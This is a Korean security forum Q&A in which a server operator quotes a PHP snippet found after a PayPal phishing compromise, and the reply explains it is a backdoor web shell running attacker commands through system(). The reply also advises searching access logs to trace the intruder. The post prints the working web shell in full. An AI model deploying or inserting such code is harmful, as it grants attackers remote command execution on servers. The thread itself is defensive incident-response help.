크래킹 피해

423,

2/22

멍멍

http://hackerschool.org

[re] php 코드 크래킹에 관한 문의입니다..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=217 [복사]

===============================================================================
>운영하고 있는 서버에
><?if(count($_GET)) extract($_GET);if(count($_POST)) extract($_POST);if(count($_SERVER)) extract($_SERVER);echo "<form action=$PHP_SELF method=post>command : <input type=text name=cmd><input type=submit></form><hr>";if($cmd){$cmd = str_replace("\\", "", $cmd);echo "<pre>"; system($cmd); echo "</pre>";}?>
>
>위 코드와 함께 paypal 피싱을 당하였습니다.
>위의 코드의 분석을 필요로 합니다.
>그럼 많은 조언 부탁드립니다.. 감사합니다..
===============================================================================

해당 소스 코드는 backdoor의 일종으로서, 공격자가 전달한 문자열을

웹 서버 권한의 쉘 명령으로 실행하는 역할을 합니다.

위 소스 코드 중 핵심만 남기면 <? system($cmd); ?> 가 됩니다.

$cmd 변수로 전달된 문자열을 system 함수로 실행한단 말입니다.

대응 방안으로써..

먼저, 위 소스 코드의 파일명을 웹 서버 로그에서 검색해 보시기 바랍니다.

예로, 아파치라면 grep xxx.php /var/log/httpd/access_log 같은 방법으로

검색하시면 됩니다.

그럼 이 백도어 파일을 요청한 로그가 나올 것입니다. (만약 공격자가 ROOT

권한까지 획득하여 로그를 지워버렸다면 나오지 않을 수도 있습니다.)

로그가 나왔다면 IP와 REFERER 부분을 보고 공격자의 정보를 얻을 수 있으며,

최초 xxx.php가 로그에 남은 시간을 기점으로 주변 로그를 분석해 보시면

공격자가 어떤 방법을 이용해서 서버에 침투했는지 찾을 수 있을 것입니다. (웹해킹으로 침투했다고 가정)

이 정보를 기반으로 취약점 패치와 공격자에 대한 법적 대응을 하시기 바랍니다.

Hit : 4117 Date : 2006/06/01 07:05